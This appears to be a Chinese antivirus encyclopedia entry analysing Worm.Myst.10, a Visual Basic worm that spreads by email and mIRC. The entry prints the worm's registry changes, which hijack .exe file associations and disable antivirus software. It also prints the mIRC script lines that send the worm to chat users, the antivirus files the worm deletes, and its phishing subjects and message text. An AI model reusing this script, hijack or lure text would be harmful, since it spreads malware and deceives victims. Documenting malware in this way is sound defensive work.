基本介紹
- 中文名:我的最愛
- 外文名:Worm.Myst.10
- 病毒類型:蠕蟲
- 影響系統:Win9x / WinNT
Worm.Myst.10,病毒行為:,
Worm.Myst.10
病毒別名:Email-Worm.Win32.generic[AVP],I-Worm/Myst.10[KV],Worm.Myst[RS]
處理時間:
威脅級別:★★
中文名稱:我的最愛
病毒類型:蠕蟲
影響系統:Win9x / WinNT
病毒行為:
這是一個用VB編寫的蠕蟲病毒,該病毒通過電子郵件和mIRC聊天系統進行傳播。該病毒會修改.exe的檔案關聯到病毒,使得每次運行exe檔案的時候該病毒都會被執行;該病毒會刪除三款防毒軟體的某些數據使得這些防毒軟體無法正常運行。該病毒除了通過在Outlook地址薄裡面收集郵件地址,將病毒做為附屬檔案傳送出去之外,它還會通過向mIRC的腳本配置檔案中寫入一些腳本,使得該病毒能夠通過mIRC聊天系統傳播。
1)病毒將自己拷貝到:
C:\windows\system\systray_.exe
C:\windows\system\runtray_.dll
2)釋放臨時檔案C:\ModReg.reg,並通過regedit /s C:\ModReg.reg命令寫入註冊表
修改exe的檔案關聯到病毒,使得每次運行exe檔案的時候該病毒都會被執行
HKEY_CLASSES_ROOT\exefile\shell\open\command
(Default)=""C:\windows\system\systray_.exe" %1 %*"
HKEY_LOCAL_MACHINE\Software\McAfee\Scan95
"SerialNum"="MYST v1.0 by MYSTiQUE"
"CurrentVersionNumber"="666"
"DAT"="NONE"
"DATFile"="-2000"
"VirusInfoURL"="http://ma***.sexchat.***"
"bVShieldEnabled"=0x0
為病毒添加啟動項:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"SystemTray"="C:\Windows\system\systray_.exe"
3)向mIRC的腳本配置檔案C:\mirc\script.ini中寫入以下內容,使得該病毒能夠通過mIRC聊天系統傳播
[script]
n0= on 1:TEXT:*sex*:#:{
n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy.So I'm going to send you one.
n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe
n3= .dcc send $nick C:\windows\system\install_show.exe
n4= }
4)刪除三款防毒軟體的以下檔案:
C:\Program Files\Norton AntiVirus\*.dat
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\*.*
C:\Program Files\Common Files\KAV Shared Files\*.*
5)在Outlook裡面收集郵件地址,並將病毒做為附屬檔案傳送給這些郵件接收者
取下面的某一行做為郵件主題:
Here is the e-mail attachment I told you about earlier, It's an installation program for an adult screensaver slideshow program
Here is the e-mail attachment I told you about earlier, It's an installation program for an Outlook Service Release upgrade
Here is the e-mail attachment I told you about earlier, It's an installation program for a Microsoft Explorer Patch
Here is the e-mail attachment I told you about earlier, It's an installation program for a Desktop Game I got off the internet
Here is the e-mail attachment I told you about earlier, It's an installation program for a brand-new MP3 player and plug-ins
Here is the e-mail attachment I told you about earlier, It's an installation program for an Microsoft Internet Explorer Service Pack (Q401243)
Here is the e-mail attachment I told you about earlier, It's an installation program for an Kaspersky Anti-Virus 4.0 bugfix
郵件正文:
Hey, sorry I haven't written to you in a while. Well you could call it a while. I'm writing this E-mail to let you know of an attachment im sending with the next mail.
Here it is
郵件附屬檔案:C:\windows\install_.exe
